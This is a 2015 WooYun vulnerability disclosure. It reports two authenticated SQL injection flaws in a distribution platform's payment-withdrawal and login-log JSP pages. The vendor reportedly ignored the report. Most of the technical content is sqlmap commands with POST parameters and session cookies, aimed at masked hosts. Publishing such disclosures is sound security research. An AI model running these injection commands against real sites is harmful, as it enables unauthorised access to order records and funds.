当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0154019

漏洞标题:神器而已之分销平台电脑版2处通用SQL注入(大量订单泄漏/大量现金可提现)

相关厂商:自我游

漏洞作者: 珈蓝夜宇

提交时间:2015-11-23 12:36

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-23: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-01-11: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

神器为: http://zone.wooyun.org/content/21289

详细说明:

https://**.**.**.**/bugs/wooyun-2015-0152055中影响的这些站登陆之后,
然后就可以注入,上次提交的是17个手机端的注入,可以影响到我的上一个漏洞,因为还没审核,我就先不贴出地址
这次来两个电脑端的
money/payDraw_list.jsp

sqlmap.py -u "http://**.**.**.**/money/payDraw_list.jsp"  --data="sdate=2015-11-11&edate=2015-11-17&search=%E6%8F%90+%E4%BA%A4&d=3"  --cookie="JSESSIONID=gKJvt0fsxird; dc4e01dbca1cd374ffb9068b31380fc2=Hb0l2XklSPjZXd0N2XklTP0IjN3UCOpZ1c39GaslTZw0mJ1N3cfRHdwlTZy0mJfd3YzVFdp9DZx0DMyInJzVXZfJmbtFTZm3Ynl7bhkTJumoXafN3ZvJXd9ACMpZ1ck9XawNTPmEGZfJGbulzaz1WYzFDMmImcs9VZp9DZ10nJzVXZfJWa9QHb5hgJ=="  --headers="User-Agent:Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36"


3.png


sqlmap.py -u "http://**.**.**.**/money/payDraw_list.jsp"  --data="sdate=2015-11-11&edate=2015-11-17&search=%E6%8F%90+%E4%BA%A4&d=3"  --cookie="JSESSIONID=enm1VHt_3RGd; dc4e01dbca1cd374ffb9068b31380fc2=Hb0l2XklSPjZXd0N2XklTP5IjM3UCOpZ1c39GaslTZw0mJ1N3cfRHdwlTZy0mJfd3YzVFdp9DZ40zN2cCN1Z2cyV2Xh5Wb9U45L6b5pKmJzl2Xyd3bwVTPmEXafNGZzlDcx0mJiR2Xpxmb9s2chFzcxAnJvJGbfVWa9QSN1Z2cyV2XklXPhdmb5dWYm4"  --headers="User-Agent:Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36"


4.png


1.png


漏洞证明:

system/usr_login_list.jsp

sqlmap.py -u "http://**.**.**.**/system/usr_login_list.jsp"  --data="action=ajaxData&lx=&pageNo=1&sdate=&eate=&user_id=&cust_id="  --cookie="JSESSIONID=gKJvt0fsxird; dc4e01dbca1cd374ffb9068b31380fc2=Hb0l2XklSPjZXd0N2XklTP0IjN3UCOpZ1c39GaslTZw0mJ1N3cfRHdwlTZy0mJfd3YzVFdp9DZx0DMyInJzVXZfJmbtFTZm3Ynl7bhkTJumoXafN3ZvJXd9ACMpZ1ck9XawNTPmEGZfJGbulzaz1WYzFDMmImcs9VZp9DZ10nJzVXZfJWa9QHb5hgJ=="  --headers="User-Agent:Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36"


5.png


sqlmap.py -u "http://**.**.**.**/system/usr_login_list.jsp"  --data="action=ajaxData&lx=&pageNo=1&sdate=&eate=&user_id=&cust_id="  --cookie="JSESSIONID=enm1VHt_3RGd; dc4e01dbca1cd374ffb9068b31380fc2=Hb0l2XklSPjZXd0N2XklTP5IjM3UCOpZ1c39GaslTZw0mJ1N3cfRHdwlTZy0mJfd3YzVFdp9DZ40zN2cCN1Z2cyV2Xh5Wb9U45L6b5pKmJzl2Xyd3bwVTPmEXafNGZzlDcx0mJiR2Xpxmb9s2chFzcxAnJvJGbfVWa9QSN1Z2cyV2XklXPhdmb5dWYm4"  --headers="User-Agent:Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36"


6.png


2.png


修复方案:

过滤

版权声明:转载请注明来源 珈蓝夜宇@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝